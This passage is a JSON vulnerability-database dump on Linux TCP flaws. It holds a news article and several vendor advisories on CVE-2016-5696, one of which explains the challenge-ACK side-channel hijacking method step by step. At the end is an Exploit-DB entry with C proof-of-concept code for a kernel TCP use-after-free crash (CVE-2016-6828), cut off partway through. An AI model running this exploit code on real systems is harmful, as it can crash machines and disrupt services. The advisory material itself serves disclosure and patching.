post](<https://blog.lookout.com/blog/2016/08/15/linux-vulnerability-android/>) published Monday by mobile security firm Lookout, the Linux flaw is present in Android version 4.4 KitKat and all future releases, including the latest developer preview of [Android Nougat](<https://thehackernews.com/2016/06/android-n-nougat-nutella.html>). \n \n\n\n### Around 1.4 BILLLLLION Android Devices Affected\n\n \nThis means that 80% of all Android devices in use today, which is nearly 1.4 Billion devices, are vulnerable to attacks, enabling hackers to spy on your communications without even compromising your network via man-in-the-middle-attack. \n \nHowever, the good news is that the Linux vulnerability is complicated and difficult to exploit, but the risk is there especially for targeted attacks. \n\n\n> \"While a man-in-the-middle attack is not required here, the attacker still needs to know a source and destination IP address to successfully execute the attack,\" Lookout stated in the blog post.\n\nWindows and Macs are not affected by the vulnerability. \n \nAccording to Google, engineers are already aware of the vulnerability and are _\"taking the appropriate actions\" _to fix the issue, a Google representative [told](<https://arstechnica.com/security/2016/08/linux-bug-leaves-1-4-billion-android-users-vulnerable-to-hijacking-attacks/>) Ars Technica. So, it is likely that a patch for Android will arrive soon. \n \n\n\n### Temporary Mitigation:\n\n * Make sure your Internet traffic is encrypted: Apps you use and Websites you visit should employ HTTPS.\n * Use a Virtual Private Network (VPN).\nTo know more about the Linux kernel flaw and its mitigation, you can head on to our post, titled \"[Linux TCP Flaw allows Hackers to Hijack Internet Traffic and Inject Malware Remotely](<https://thehackernews.com/2016/08/linux-tcp-packet-hacking.html>).\"\n", "modified": "2016-08-16T12:37:16", "published": "2016-08-16T01:31:00", "id": "THN:4FE2068BDC86E2EECDC3F2C86932F8F2", "href": "https://thehackernews.com/2016/08/hack-linux-android.html", "type": "thn", "title": "Internet Traffic Hijacking Linux Flaw Affects 80% of Android Devices", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:45", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5696"], "description": "A security issue has been found in the Linux kernel's implementation of\nchallenge ACKs as specified in RFC 5961. An attacker which knows a\nconnection's client IP, server IP and server port can abuse the\nchallenge ACK mechanism to determine the accuracy of a normally 'blind'\nattack on the client or server.\n\nSuccessful exploitation of this flaw could allow a remote attacker to\ninject or control a TCP stream contents in a connection between a Linux\ndevice and its connected client/server.", "modified": "2016-08-14T00:00:00", "published": "2016-08-14T00:00:00", "id": "ASA-201608-12", "href": "https://lists.archlinux.org/pipermail/arch-security/2016-August/000686.html", "type": "archlinux", "title": "linux: information disclosure", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-02T18:44:46", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5696"], "description": "A security issue has been found in the Linux kernel's implementation of\nchallenge ACKs as specified in RFC 5961. An attacker which knows a\nconnection's client IP, server IP and server port can abuse the\nchallenge ACK mechanism to determine the accuracy of a normally 'blind'\nattack on the client or server.\n\nSuccessful exploitation of this flaw could allow a remote attacker to\ninject or control a TCP stream contents in a connection between a Linux\ndevice and its connected client/server.", "modified": "2016-08-17T00:00:00", "published": "2016-08-17T00:00:00", "id": "ASA-201608-15", "href": "https://lists.archlinux.org/pipermail/arch-security/2016-August/000689.html", "type": "archlinux", "title": "linux-zen: information disclosure", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-02T18:44:47", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5696"], "description": "A security issue has been found in the Linux kernel's implementation of\nchallenge ACKs as specified in RFC 5961. An attacker which knows a\nconnection's client IP, server IP and server port can abuse the\nchallenge ACK mechanism to determine the accuracy of a normally 'blind'\nattack on the client or server.\n\nSuccessful exploitation of this flaw could allow a remote attacker to\ninject or control a TCP stream contents in a connection between a Linux\ndevice and its connected client/server.", "modified": "2016-08-14T00:00:00", "published": "2016-08-14T00:00:00", "id": "ASA-201608-13", "href": "https://lists.archlinux.org/pipermail/arch-security/2016-August/000687.html", "type": "archlinux", "title": "linux-grsec: information disclosure", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-02T18:44:35", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5696"], "description": "A security issue has been found in the Linux kernel's implementation of\nchallenge ACKs as specified in RFC 5961. An attacker which knows a\nconnection's client IP, server IP and server port can abuse the\nchallenge ACK mechanism to determine the accuracy of a normally 'blind'\nattack on the client or server.\n\nSuccessful exploitation of this flaw could allow a remote attacker to\ninject or control a TCP stream contents in a connection between a Linux\ndevice and its connected client/server.", "modified": "2016-08-21T00:00:00", "published": "2016-08-21T00:00:00", "id": "ASA-201608-17", "href": "https://lists.archlinux.org/pipermail/arch-security/2016-August/000691.html", "type": "archlinux", "title": "linux-lts: information disclosure", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "paloalto": [{"lastseen": "2020-12-24T13:20:57", "bulletinFamily": "software", "cvelist": ["CVE-2016-5696"], "description": "A vulnerability exists in the kernel of PAN-OS that may result in Information Disclosure. The challenge ACK rate limiting in the kernel's networking subsystem may allow an off-path attacker to leak certain information about a given connection by creating congestion on the global challenge ACK rate limit counter and then measuring the changes by probing packets. (ref # PAN-62500 / CVE-2016-5696).\nSuccessful exploitation of this issue may allow an attacker to terminate a TCP connection or inject a payload into non-secured TCP connection between two endpoints on the network.\nThis issue affects PAN-OS 6.1, PAN-OS 7.0.15 and earlier, PAN-OS 7.1.9 and earlier\n\n\n**Work around:**\nN/A", "edition": 6, "modified": "2017-05-23T03:00:00", "published": "2017-05-23T03:00:00", "id": "PAN-SA-2017-0015", "href": "https://securityadvisories.paloaltonetworks.com/CVE-2016-5696", "title": "Kernel Vulnerability", "type": "paloalto", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "centos": [{"lastseen": "2019-12-20T18:28:35", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5696"], "description": "**CentOS Errata and Security Advisory** CESA-2016:1664\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\nIt was found that the RFC 5961 challenge ACK rate limiting as implemented in the Linux kernel's networking subsystem allowed an off-path attacker to leak certain information about a given connection by creating congestion on the global challenge ACK rate limit counter and then measuring the changes by probing packets. An off-path attacker could use this flaw to either terminate TCP connection and/or inject payload into non-secured TCP connection between two endpoints on the network. (CVE-2016-5696, Important)\n\nRed Hat would like to thank Yue Cao (Cyber Security Group of the CS department of University of California in Riverside) for reporting this issue.\n\nBug Fix(es):\n\n* When loading the Direct Rendering Manager (DRM) kernel module, the kernel panicked if DRM was previously unloaded. The kernel panic was caused by a memory leak of the ID Resolver (IDR2). With this update, IDR2 is loaded during kernel boot, and the kernel panic no longer occurs in the described scenario. (BZ#1353827)\n\n* When more than one process attempted to use the \"configfs\" directory entry at the same time, a kernel panic in some cases occurred. With this update, a race condition between a directory entry and a lookup operation has been fixed. As a result, the kernel no longer panics in the described scenario. (BZ#1353828)\n\n* When shutting down the system by running the halt -p command, a kernel panic occurred due to a conflict between the kernel offlining CPUs and the sched command, which used the sched group and the sched domain data without first checking the data. The underlying source code has been fixed by adding a check to avoid the conflict. As a result, the described scenario no longer results in a kernel panic. (BZ#1343894)\n\n* In some cases, running the ipmitool command caused a kernel panic due to a race condition in the ipmi message handler. This update fixes the race condition, and the kernel panic no longer occurs in the described scenario. (BZ#1355980)\n\n* Previously, multiple Very Secure FTP daemon (vsftpd) processes on a directory with a large number of files led to a high contention rate on each inode's spinlock, which caused excessive CPU usage. With this update, a spinlock to protect a single memory-to-memory copy has been removed from the ext4_getattr() function. As a result, system CPU usage has been reduced and is no longer excessive in the described situation. (BZ#1355981)\n\n* When the gfs2_grow utility is used to extend Global File System 2 (GFS2), the next block allocation causes the GFS2 kernel module to re-read its resource group index. If multiple processes in the GFS2 module raced to do the same thing, one process sometimes overwrote a valid object pointer with an invalid pointer, which caused either a kernel panic or a file system corruption. This update ensures that the resource group object pointer is not overwritten. As a result, neither kernel panic nor file system corruption occur in the described scenario. (BZ#1347539)\n\n* Previously, the SCSI Remote Protocol over InfiniBand (IB-SRP) was disabled due to a bug in the srp_queue() function. As a consequence, an attempt to enable the Remote Direct Memory Access (RDMA) at boot caused the kernel to crash. With this update, srp_queue() has been fixed, and the system now boots as expected when RDMA is enabled. (BZ#1348062)\n\nEnhancement(s):\n\n* This update optimizes the efficiency of the Transmission Control Protocol (TCP) when the peer is using a window under 537 bytes in size. As a result, devices that use maximum segment size (MSS) of 536 bytes or fewer will experience improved network performance. (BZ#1354446)\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2016-August/034091.html\n\n**Affected packages:**\nkernel\nkernel-abi-whitelists\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-firmware\nkernel-headers\nperf\npython-perf\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2016-1664.html", "edition": 3, "modified": "2016-08-23T20:59:58", "published": "2016-08-23T20:59:58", "href": "http://lists.centos.org/pipermail/centos-announce/2016-August/034091.html", "id": "CESA-2016:1664", "title": "kernel, perf, python security update", "type": "centos", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-12-20T18:25:41", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5696"], "description": "**CentOS Errata and Security Advisory** CESA-2016:1633\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nIt was found that the RFC 5961 challenge ACK rate limiting as implemented \nin the Linux kernel's networking subsystem allowed an off-path attacker to \nleak certain information about a given connection by creating congestion on \nthe global challenge ACK rate limit counter and then measuring the changes \nby probing packets. An off-path attacker could use this flaw to either \nterminate TCP connection and/or inject payload into non-secured TCP \nconnection between two endpoints on the network. (CVE-2016-5696, Important)\n\nRed Hat would like to thank Yue Cao from Cyber Security Group in the CS department of University of California, Riverside, for reporting this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2016-August/034078.html\n\n**Affected packages:**\nkernel\nkernel-abi-whitelists\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-headers\nkernel-tools\nkernel-tools-libs\nkernel-tools-libs-devel\nperf\npython-perf\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2016-1633.html", "edition": 3, "modified": "2016-08-20T02:00:21", "published": "2016-08-20T02:00:21", "href": "http://lists.centos.org/pipermail/centos-announce/2016-August/034078.html", "id": "CESA-2016:1633", "title": "kernel, perf, python security update", "type": "centos", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "symantec": [{"lastseen": "2020-12-24T10:41:20", "bulletinFamily": "software", "cvelist": ["CVE-2016-5696"], "description": "### SUMMARY\n\nBlue Coat products that include a vulnerable version of an operating system that supports RFC 5961 are susceptible to a TCP session hijacking vulnerability. A remote, off-path attacker can infer the sequence numbers of an existing TCP connection, and either reset the connection or inject arbitrary data. \n \n\n\n### AFFECTED PRODUCTS\n\nThe following products are vulnerable:\n\n**Content Analysis System (CAS)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-5696 | 2.1 and later | Not vulnerable, fixed in 2.1.1.1 \n1.3 | Upgrade to 1.3.7.3. \n \n \n\n**Mail Threat Defense (MTD)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-5696 | 1.1 | Not available at this time \n \n \n\n**Malware Analysis Appliance (MAA)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-5696 | 4.2 | Upgrade to 4.2.11. \n \n \n\n**Management Center (MC)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-5696 | 1.8 and later | Not vulnerable, fixed in 1.8.1.1 \n1.7 | Upgrade to 1.7.2.1. \n1.6 | Upgrade to later release with fixes. \n1.5 | Upgrade to later release with fixes. \n \n \n\n**Norman Shark Industrial Control System Protection (ICSP)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-5696 | 5.4 and later | Not vulnerable, fixed in 5.4.1 \n5.3 | Upgrade to later release with fixes. \n \n \n\n**Norman Shark Network Protection (NNP)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-5696 | 5.3 | A fix will not be provided. \n \n \n\n**Norman Shark SCADA Protection (NSP)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-5696 | 5.3 | A fix will not be provided. Customers who use NSP for USB cleaning can switch to a version of ICSP with fixes. \n \n \n\n**PacketShaper (PS) S-Series** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-5696 | 11.7 and later | Not vulnerable, fixed in 11.7.1.1 \n11.6 | Upgrade to 11.6.2.1. \n11.2, 11.3, 11.4, 11.5 | Upgrade to later release with fixes. \n \n \n\n**PolicyCenter (PC) S-Series** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-5696 | 1.1 | Upgrade to 1.1.3.1. \n \n \n\n**Reporter** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-5696 | 10.2 and later | Not vulnerable, fixed in 10.2.1.1. \n10.1 | Upgrade to 10.1.5.1. \n9.5 | Not vulnerable \n9.4 | Not vulnerable \n \n \n\n**Security Analytics** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-5696 | 7.3 and later | Not vulnerable, fixed in 7.3.1. \n7.2 | Upgrade to 7.2.2. \n7.1 | Not vulnerable \n6.6 | Not vulnerable \n \n \n\n**SSL Visibility (SSLV)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-5696 | 3.11 and later | Not vulnerable, fixed in 3.11.1.1 \n3.10 | Not available at this time \n3.9 | Upgrade to 3.9.7.1. \n3.8.4FC | Upgrade to later release with fixes. \n \n \nThe following products have a vulnerable version of an operating system that supports RFC 5961, but are not vulnerable to known vectors of attack:\n\n**Advanced Secure Gateway (ASG)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-5696 | 6.7 and later | Not vulnerable, fixed in 6.7.2.1 \n6.6 | Upgrade to 6.6.5.4. \n \n \n\n### ADDITIONAL PRODUCT INFORMATION \n\nThe following products are not vulnerable: \n**Android Mobile Agent \nAuthConnector \nBCAAA \nBlue Coat HSM Agent for the Luna SP \nCacheFlow \nClient Connector \nCloud Data Protection for Salesforce \nCloud Data Protection for Salesforce Analytics \nCloud Data Protection for ServiceNow \nCloud Data Protection for Oracle CRM On Demand \nCloud Data Protection for Oracle Field Service Cloud \nCloud Data Protection for Oracle Sales Cloud \nCloud Data Protection Integration Server \nCloud Data Protection Communication Server \nCloud Data Protection Policy Builder \nDirector \nGeneral Auth Connector Login Application \nIntelligenceCenter \nIntelligenceCenter Data Collector \nK9 \nPacketShaper \nPolicyCenter \nProxyAV \nProxyAV ConLog and ConLogXP \nProxyClient \nProxySG \nX-Series XOS \nUnified Agent \nWeb Isolation**\n\nBlue Coat no longer provides vulnerability information for the following products:\n\n**DLP** \nPlease, contact Digital Guardian technical support regarding vulnerability information for DLP. \n \n\n\n### ISSUES \n\n**CVE-2016-5696** \n--- \n**Severity / CVSSv2** | Medium / 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N) \n**References** | SecurityFocus: [BID 91704](<https://www.securityfocus.com/bid/91704>) / NVD: [CVE-2016-5696](<https://nvd.nist.gov/vuln/detail/CVE-2016-5696>) \n**Impact** | Denial of service, unauthorized data modification \n**Description** | A side channel flaw in TCP packet handling allows a remote attacker to send spoofed packets and hijack a TCP connection. The attacker can reset the connection or inject arbitrary data. \n \nThis Security Advisory addresses TCP session hijacking vulnerabilities in operating systems that support _RFC 5961 - Improving TCP's Robustness to Blind In-Window Attacks_. RFC 5961 provides defenses against the following blind in-window attacks that affect the original TCP protocol specified in _RFC 793 - Transmission Control Protocol_:\n\n * Blind reset attack using TCP reset (RST) packets - a remote, off-path attacker can use spoofed RST packets to reset an existing TCP connection.\n * Blind reset attack using TCP synchronize (SYN) packets - a remote, off-path attacker can use spoofed SYN packets to reset an existing TCP connection.\n * Blind data injection attack - a remote, off-path attacker can use spoofed data packets to inject arbitrary data into an existing TCP connection.\n\nAccording to RFC 793, TCP hosts that receive one of the packets above only need to verify that the packet's sequence number is within the target's receive window. An attacker can successfully perform these attacks if they can guess sequence numbers within the target's receive window. RFC 5961 tightens the sequence number checks as follows:\n\n 1. If the packet's sequence number matches exactly the next expected sequence number, the target TCP host accepts the packet.\n 2. If the packet's sequence number does not match the next expected sequence number, but is within the target's receive window, the target TCP host responds with a challenge acknowledgement (ACK) packet. The challenge ACK packet forces the sender to resend the packet with the exact sequence number expected by the target. If the original packet is spoofed, the off-path attacker never receives the challenge ACK packet and the attack cannot proceed.\n\nRFC 5961 specifies a challenge ACK throttling mechanism to control the rate of outgoing challenge ACK packets and prevent them from consuming the target host's CPU and bandwidth resources. The throttling mechanism uses a global, system-wide counter to control the rate of challenge ACK packets among all existing network connections on the system. The counter is configurable, but uses a well-known default value _N_.\n\nSecurity researchers have discovered that the global challenge ACK counter exposes a side channel for inferring TCP sequence numbers and hijacking existing TCP connections:\n\n 1. The attacker sends a spoofed packet to the target. If the packet's sequence number is within the target's receive window, the target responds with a challenge ACK packet and decrements the global challenge ACK counter from _N_ to _N-1_.\n 2. The attacker establishes a direct TCP connection to the target and sends _N_ non-spoofed packets with in-window sequence numbers. If the attacker receives _N-1_ challenge ACK packets in response, the sequence number of the spoofed packet in step 1 was within the target's received window. If the attacker receives _N_ challege ACK packets, the spoofed packet's sequence number was not in the target's receive window.\n\nAfter guessing the TCP connection's sequence numbers, the attacker can reset the connection or inject arbitrary data. \n \n\n\n### REFERENCES \n\nOff-Path TCP Exploits: Global Rate Limit Considered Dangerous - <http://www.cs.ucr.edu/~zhiyunq/pub/sec16_TCP_pure_offpath.pdf> \nRFC 5961 - Improving TCP's Robustness to Blind In-Window Attacks - <https://tools.ietf.org/html/rfc5961> \nRFC 793 - Transmission Control Protocol - <https://tools.ietf.org/html/rfc793> \n \n\n\n### REVISION\n\n2020-04-23 A fix will not be provided in Industrial Control System Protection (ICSP) 5.3. Please upgrade to a later release with the vulnerability fixes. Advisory status changed to Closed. \n2019-10-02 Web Isolation is not vulnerable. \n2019-09-21 SA 8.0 is not vulnerable. ICSP 5.4 is not vulnerable because a fix is available in 5.4.1. \n2018-08-03 Customers who use NSP for USB cleaning can switch to a version of Industrial Control System Protection (ICSP) with fixes. \n2018-06-29 A fix for Norman Shark Network Protection (NNP) 5.3 and Norman Shark SCADA Protection (NSP) 5.3 will not be provided. \n2018-04-22 PacketShaper S-Series 11.10 is not vulnerable. \n2017-11-06 ASG 6.7 is not vulnerable because a fix is available in 6.7.2.1. \n2017-08-02 SSLV 4.1 is not vulnerable. \n2017-07-24 PacketShaper S-Series 11.9 is not vulnerable. \n2017-07-20 MC 1.10 is not vulnerable. \n2017-06-22 Security Analytics 7.3 is not vulnerable. \n2017-06-05 PacketShaper S-Series 11.8 is not vulnerable. \n2017-05-18 CAS 2.1 is not vulnerable. \n2017-03-30 MC 1.9 is not vulnerable. \n2017-03-29 A fix for ASG 6.6 is available in 6.6.5.4. \n2017-03-08 MC 1.8 is not vulnerable. ProxySG 6.7 is not vulnerable. SSLV 4.0 is not vulnerable. A fix for PolicyCenter S-Series is available in 1.1.3.1. Vulnerability inquiries for DLP should be addressed to Digital Guardian technical support. \n2017-01-25 A fix for Security Analytics 7.2 is available in 7.2.2. \n2017-01-24 A fix for CAS 1.3 is available in 1.3.7.3. \n2017-01-13 A fix in SSLV 3.9 is available in 3.9.7.1. \n2017-01-10 A fix for Reporter 10.1 is available in 10.1.5.1. \n2016-12-19 A fix for MAA is available in 4.2.11. \n2016-12-02 A fix is available in SSLV 3.11.1.1. \n2016-12-02 PacketShaper S-Series 11.7 is not vulnerable. \n2016-11-17 Cloud Data Protection for Oracle Field Service Cloud is not vulnerable. \n2016-11-14 MC 1.7 is vulnerable and a fix for MC 1.7 is available in 1.7.2.1. \n2016-11-11 SSLV 3.10 is vulnerable. A fix is not available at this time. \n2016-11-04 A fix for PacketShaper S-Series is available in 11.6.2.1. \n2016-09-14 initial public release \n2016-09-15 ASG has a vulnerable version of an operating system that supports RFC 5961, but is not vulnerable to known vectors of attack.\n", "modified": "2020-04-23T20:02:44", "published": "2016-09-14T08:00:00", "id": "SMNTC-1378", "href": "", "type": "symantec", "title": "SA131 : TCP Session Hijacking in Operating Systems Supporting RFC 5961", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-11-09T10:57:12", "description": "Linux Kernel - TCP Related Read Use-After-Free. CVE-2016-6828. Dos exploit for Linux platform", "published": "2016-08-18T00:00:00", "type": "exploitdb", "title": "Linux Kernel - TCP Related Read Use-After-Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-6828"], "modified": "2016-08-18T00:00:00", "id": "EDB-ID:40731", "href": "https://www.exploit-db.com/exploits/40731/", "sourceData": "// Source: https://marcograss.github.io/security/linux/2016/08/18/cve-2016-6828-linux-kernel-tcp-uaf.html\r\n\r\n// to build clang derp4.c -o derp4 -static\r\n\r\n#include <unistd.h>\r\n#include <sys/syscall.h>\r\n#include <string.h>\r\n#include <stdint.h>\r\n#include <pthread.h>\r\n#include <stdio.h>\r\n\r\n#ifndef SYS_mmap\r\n#define SYS_mmap 9\r\n#endif\r\n#ifndef SYS_socket\r\n#define SYS_socket 41\r\n#endif\r\n#ifndef SYS_bind\r\n#define SYS_bind 49\r\n#endif\r\n#ifndef SYS_sendto\r\n#define SYS_sendto 44\r\n#endif\r\n#ifndef SYS_setsockopt\r\n#define SYS_setsockopt 54\r\n#endif\r\n#ifndef SYS_dup\r\n#define SYS_dup 32\r\n#endif\r\n#ifndef SYS_sendmsg\r\n#define SYS_sendmsg 46\r\n#endif\r\n#ifndef SYS_recvfrom\r\n#define SYS_recvfrom 45\r\n#endif\r\n#ifndef SYS_write\r\n#define SYS_write 1\r\n#endif\r\n\r\nlong r[62];\r\n\r\n\r\nint main(int argc, char **argv)\r\n{\r\n while (1) {\r\n pid_t pid = fork();\r\n\r\n if (pid == 0) {\r\n r[0] = syscall(SYS_mmap, 0x20000000ul, 0x20000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul);\r\n r[1] = syscall(SYS_socket, 0xaul, 0x1ul, 0x0ul, 0, 0, 0);\r\n memcpy((void*)0x20006000, \"\\x0a\\x00\\xab\\x12\\xc7\\x17\\x1c\\x83\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x4f\\xdc\\xc0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\", 128);\r\n r[3] = syscall(SYS_bind, r[1], 0x20006000ul, 0x80ul, 0, 0, 0);\r\n r[4] = syscall(SYS_mmap, 0x20020000ul, 0x1000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul);\r\n memcpy((void*)0x20012f5a, \"\\x25\\xf9\\x1b\\xd4\\xeb\\xf5\\x39\\x3c\\xd5\\x80\\xf6\\xf0\\xd6\\xe1\\xff\\x65\\x30\\x97\\xac\\xaf\\x1b\\xbc\\xc8\\xae\\xa4\\x1e\\xab\\xd8\\x60\\x51\\xcb\\x4b\\xed\\xae\\xaa\\x37\\xda\\x80\\xf9\\x06\\xb8\\x6b\\xdf\\x78\\x0f\\xd0\\x87\\xf2\\x65\\x5f\\x5e\\x85\\xb5\\x4d\\x6b\\x48\\xff\\xf3\\x0d\\x46\\x1c\\xe5\\xa4\\x48\\x38\\x78\\x18\\x71\\x9b\\x75\\xc4\\xc9\\x77\\xf2\\xc4\\x5f\\x88\\x8e\\xd2\\x8d\\x97\\x26\\x56\\x4c\\x93\\x31\\xbc\\x64\\x22\\xff\\xdc\\x68\\x01\\x74\\x43\\xea\\x84\\x6f\\x1d\\x90\\xeb\\x98\\x6c\\xe9\\x1c\\x3b\\x72\\xab\\xa0\\xb5\\x5b\\xe8\\xee\\xfb\\xf3\\x2d\\x96\\xa0\\xd4\\x13\\x55\\xbc\\xd4\\xe0\\x41\\xfd\\x78\\x7e\\x90\\xf9\\x9f\\x9c\\x57\\x32\\x47\\xf2\\xcf\\x7f\\x4a\\x7b\\x79\\x0a\\xdd\\xb4\\xce\\xbd\\x0b\\x44\\x02\\x95\\x0f\\xaf\\x50\\xff\\x87\\x90\\x09\\xaa\\x94\\x01\\x41\\x43\\x08\\x8e\\xb1\", 165);\r\n memcpy((void*)0x20020000, \"\\x0a\\x00\\xab\\x12\\x0d\\xf5\\xba\\x69\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\xac\\xad\\xce\\xa0\", 28);\r\n r[7] = syscall(SYS_sendto, r[1], 0x20012f5aul, 0xa5ul, 0x249e4e54fe149d8cul, 0x20020000ul, 0x1cul);\r\n *(uint32_t*)0x20001fff = (uint32_t)0x2;\r\n r[9] = syscall(SYS_setsockopt, r[1], 0x1ul, 0x8ul, 0x20001ffful, 0x4ul, 0);\r\n r[10] = syscall(SYS_dup, r[1], 0, 0, 0, 0, 0);\r\n *(uint32_t*)0x20018000 = (uint32_t)0x4;\r\n r[12] = syscall(SYS_setsockopt, r[1], 0x29ul, 0xbul, 0x20018000ul, 0x4ul, 0);\r\n *(uint64_t*)0x2000dfc8 = (uint64_t)0x2000e000;\r\n *(uint32_t*)0x2000dfd0 = (uint32_t)0xc;\r\n *(uint64_t*)0x2000dfd8 = (uint64_t)0x20000000;\r\n *(uint64_t*)0x2000dfe0 = (uint64_t)0x1;\r\n *(uint64_t*)0x2000dfe8 = (uint64_t)0x0;\r\n *(uint64_t*)0x2000dff0 = (uint64_t)0x0;\r\n *(uint32_t*)0x2000dff8 = (uint32_t)0x4;\r\n *(uint16_t*)0x2000e000 = (uint16_t)0x0;\r\n *(uint16_t*)0x2000e002 = (uint16_t)0x0;\r\n *(uint32_t*)0x2000e004 = (uint32_t)0xffff;\r\n *(uint32_t*)0x2000e008 = (uint32_t)0x401;\r\n *(uint64_t*)0x20000000 = (uint64_t)0x2000ed3a;\r\n *(uint64_t*)0x20000008 = (uint64_t)0x37;\r\n *(uint32_t*)0x2000ed3a = (uint32_t)0x14;\r\n *(uint16_t*)0x2000ed3e = (uint16_t)0x2;\r\n *(uint16_t*)0x2000ed40 = (uint16_t)0x12;\r\n *(uint32_t*)0x2000ed42 = (uint32_t)0x1f;\r\n *(uint32_t*)0x2000ed46 = (uint32_t)0x7;\r\n *(uint8_t*)0x2000ed4a = (uint8_t)0x6;\r\n *(uint8_t*)0x2000ed4b = (uint8_t)0x100;\r\n *(uint8_t*)0x2000ed4c = (uint8_t)0x3f;\r\n *(uint32_t*)0x2000ed4d = (uint32_t)0x11;\r\n *(uint16_t*)0x2000ed51 = (uint16_t)0x0;\r\n *(uint16_t*)0x2000ed53 = (uint16_t)0x808;\r\n *(uint32_t*)0x2000ed55 = (uint32_t)0x1;\r\n *(uint32_t*)0x2000ed59 = (uint32_t)0x0;\r\n *(uint8_t*)0x2000ed5d = (uint8_t)0x0;\r\n *(uint32_t*)0x2000ed5e = (uint32_t)0x12;\r\n *(uint16_t*)0x2000ed62 = (uint16_t)0x2ea;\r\n *(uint16_t*)0x2000ed64 = (uint16_t)0x200;\r\n *(uint32_t*)0x2000ed66 = (uint32_t)0x5;\r\n *(uint32_t*)0x2000ed6a = (uint32_t)0xffffffffffffffff;\r\n *(uint8_t*)0x2000ed6e = (uint8_t)0x9;\r\n *(uint8_t*)0x2000ed6f = (uint8_t)0x1;\r\n r[47] = syscall(SYS_sendmsg, r[10], 0x2000dfc8ul, 0x801ul, 0, 0, 0);\r\n *(uint16_t*)0x20001003 = (uint16_t)0x1;\r\n *(uint8_t*)0x20001005 = (uint8_t)0x0;\r\n *(uint32_t*)0x20001007 = (uint32_t)0x9;\r\n r[51] = syscall(SYS_recvfrom, r[10], 0x20014a91ul, 0xdeul, 0x0ul, 0x20000ffbul, 0x8ul);\r\n memcpy((void*)0x20015285, 